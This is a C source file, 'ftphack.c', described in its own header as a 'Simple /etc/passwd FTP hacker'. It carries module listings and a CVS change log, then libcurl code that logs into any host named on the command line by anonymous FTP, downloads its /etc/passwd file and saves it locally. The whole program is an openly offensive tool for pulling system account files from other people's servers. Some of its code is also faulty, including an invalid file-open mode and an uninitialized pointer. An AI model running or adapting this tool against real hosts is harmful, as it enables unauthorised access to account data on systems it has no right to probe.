/*****************************************************************************
 *                                  _   _ ____  _
 *  Project                     ___| | | |  _ \| |
 *                             / __| | | | |_) | |
 *                            | (__| |_| |  _ <| |___
 *                             \___|\___/|_| \_\_____|
 *
 * Simple /etc/passwd FTP hacker....  requires the following DLLs:
 * 	cygwin1, cygcrypto, cygsll and curl-lib
 *
 
------------------------------------------------------------------------------------
 
Executable modules
Base       Size       Entry      Name       Path
00400000   00005000   00401000   FTPHACK    C:\SRC\C\TINYCRACK\SOURCE\FTP\FTPHACK.EXE
00410000   000A0000   00490678   CYGCRYPT   C:\TOOLS\CYGWIN\BIN\CYGCRYPTO.DLL
004B0000   0002B000   004CF20C   CYGSSL     C:\TOOLS\CYGWIN\BIN\CYGSSL.DLL
10000000   0001F000   10017CD4   CYGCURL-   C:\TOOLS\CYGWIN\BIN\CYGCURL-2.DLL
61000000   00109000   6102B9B8   CYGWIN1    C:\TOOLS\CYGWIN\BIN\CYGWIN1.DLL
BFF60000   00087000   BFF74F8F   KERNEL32   C:\WIN_ME\SYSTEM\KERNEL32.DLL
 
------------------------------------------------------------------------------------
 
Executable modules
Base       Size       Entry      Name       Path
00330000   000A0000   003B0678   cygcrypt   c:\tools\cygwin\bin\cygcrypto.dll
003D0000   0002B000   003EF20C   cygssl     c:\tools\cygwin\bin\cygssl.dll
00400000   00006000   00401000   ftphack    C:\src\c\TinyCrack\Source\ftp\ftphack.exe
10000000   0001F000   10017CD4   cygcurl-   c:\tools\cygwin\bin\cygcurl-2.dll
4FB80000   0000A000   4FB82B63   psapi      C:\WINNT40\System32\psapi.dll
5F7F0000   00007000              rpcltc1    C:\WINNT40\System32\rpcltc1.dll
61000000   00109000   6102B9B8   cygwin1    c:\tools\cygwin\bin\cygwin1.dll
76AE0000   0001D000   76AE53EF   IMAGEHLP   C:\WINNT40\System32\IMAGEHLP.dll
77DC0000   0003F000   77DC1000   advapi32   C:\WINNT40\System32\advapi32.dll
77E10000   00057000   77E220DD   RPCRT4     C:\WINNT40\system32\RPCRT4.dll
77E70000   00055000   77E781D7   USER32     C:\WINNT40\system32\USER32.dll
77ED0000   0002C000              GDI32      C:\WINNT40\system32\GDI32.dll
77F00000   00063000   77F01000   KERNEL32   C:\WINNT40\system32\KERNEL32.dll
77F70000   00060000              ntdll      C:\WINNT40\System32\ntdll.dll
 
------------------------------------------------------------------------------------
ldd ftphack
	libcurl.so.2 => /usr/lib/libcurl.so.2 (0x40025000)
	libc.so.6 => /lib/libc.so.6 (0x40044000)
	libssl.so.0.9.6 => /usr/lib/i686/cmov/libssl.so.0.9.6 (0x40176000)
	libcrypto.so.0.9.6 => /usr/lib/i686/cmov/libcrypto.so.0.9.6 (0x401a4000)
	libdl.so.2 => /lib/libdl.so.2 (0x4025c000)
	/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
------------------------------------------------------------------------------------
 *
 * $Id: ftphack.c,v 1.7 2004/07/23 06:20:43 ralproth Exp $
 * $Log: ftphack.c,v $
 * Revision 1.7  2004/07/23 06:20:43  ralproth
 * Fixes for new cURL unit: TRUE -> 1
 *
 * Revision 1.6  2003/11/24 22:36:03  ralproth
 * Fixed a bug with unlink()
 *
 * Revision 1.5  2003/01/13 17:59:25  ralph
 * Fixed halt() routine.
 *
 * Revision 1.4  2003/01/03 15:43:07  ralph
 * y2k3 changes
 *
 * Revision 1.3  2002/04/15 20:35:18  ralph
 * Fixed fopen. Added more DLL comments.
 *
 * Revision 1.2  2002/04/09 16:14:56  ralph
 * Fixed ID bug
 * Added usage()
 *
 * Revision 1.1  2002/04/01 21:04:45  ralph
 * Initial import into WinCVS
 *
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <curl/types.h>
#include <curl/easy.h>
#include <unistd.h>

/*
 * Similar to ftpget.c but this also stores the received response-lines
 * in a separate file using our own callback!
 *
 * This functionality was introduced in libcurl 7.9.3.
 */

size_t write_response(void *ptr, size_t size, size_t nmemb, void *data)
{
    FILE *writehere = (FILE *)data;
    return fwrite(ptr, size, nmemb, writehere);
}

int main(int argc, char **argv)
{
    CURL *curl;
    CURLcode res;
    FILE *ftpfile;
    FILE *respfile;
    char szFTP[256], szHost[256], *szUrl;
    int  bFlag;

    if (argc < 2)
    {
        printf("ftphack(er) (%s), $Id: ftphack.c,v 1.7 2004/07/23 06:20:43 ralproth Exp $\n\nusage:\n", __DATE__);
        puts("\t ftphack   hostname|ip-adress|url\n");
        puts("Default: anomymous ftp access to /etc/passwd");
        return 2;
    }
    sprintf(szHost,"%s.pw", argv[argc-1]);
    sprintf(szFTP, "ftp://%s//etc/passwd", argv[argc-1]);
    printf("*** (%s) ***\n", szFTP);

    /* local file name to store the file as */
    ftpfile = fopen(szHost, "t"); /* wa, b is binary, needed on win32 */

    /* local file name to store the FTP server's response lines in */
    /* w+t, b is binary, needed on win32 */
    respfile = fopen("ftp-responses.txt", "wat"); 
    if (respfile == NULL)
    {
	    perror("ftp-responses.txt");
	    exit(3);
    };    
    fprintf(respfile, "\n[%s]\n", argv[argc-1]);

/*  CURL_GLOBAL_ALL, CURL_GLOBAL_DEFAULT, CURL_GLOBAL_WIN32, CURL_GLOBAL_SSL */
    curl_global_init(CURL_GLOBAL_WIN32);

    curl = curl_easy_init();

    if(curl)
    {
        /* progress meter please */
        curl_easy_setopt(curl, CURLOPT_NOPROGRESS, 1); /* 0..1 */

        /* Get a file */
        /*  curl_easy_setopt(curl, CURLOPT_USERPWD, "ftp:ftp"); */
        curl_easy_setopt(curl, CURLOPT_URL, szFTP);
        curl_easy_setopt(curl, CURLOPT_FILE, ftpfile);
        curl_easy_setopt(curl, CURLOPT_HEADERFUNCTION, write_response);
        curl_easy_setopt(curl, CURLOPT_WRITEHEADER, respfile);

        /* Switch on full protocol/debug output */
        curl_easy_setopt(curl, CURLOPT_VERBOSE, 1 /* TRUE */ );

        res = curl_easy_perform(curl);
    	puts("CURL-perform: OK!");

        if (res == 0)
        {
            curl_easy_getinfo(curl, CURLINFO_EFFECTIVE_URL, szUrl);
            printf("Current URL = %s\n", szUrl);
        }
        else printf("ERROR, return code = %i\n", res);

        /* always cleanup */
        curl_easy_cleanup(curl);
        bFlag = 0;
    }
    else
        bFlag = 1;

    fprintf(respfile, "\n");
    curl_global_cleanup();

    if ((bFlag == 1) || ( res != CURLE_OK))
    {
        printf("*** Error (%d), cleaning up!\n", res);
        unlink(szHost /* ftpfile */ );
        return 1;
    }

    fclose(ftpfile); /* close the local file */
    fclose(respfile); /* close the response file */

    puts("All done!");		/* for debugging.. */
    return 0;
}
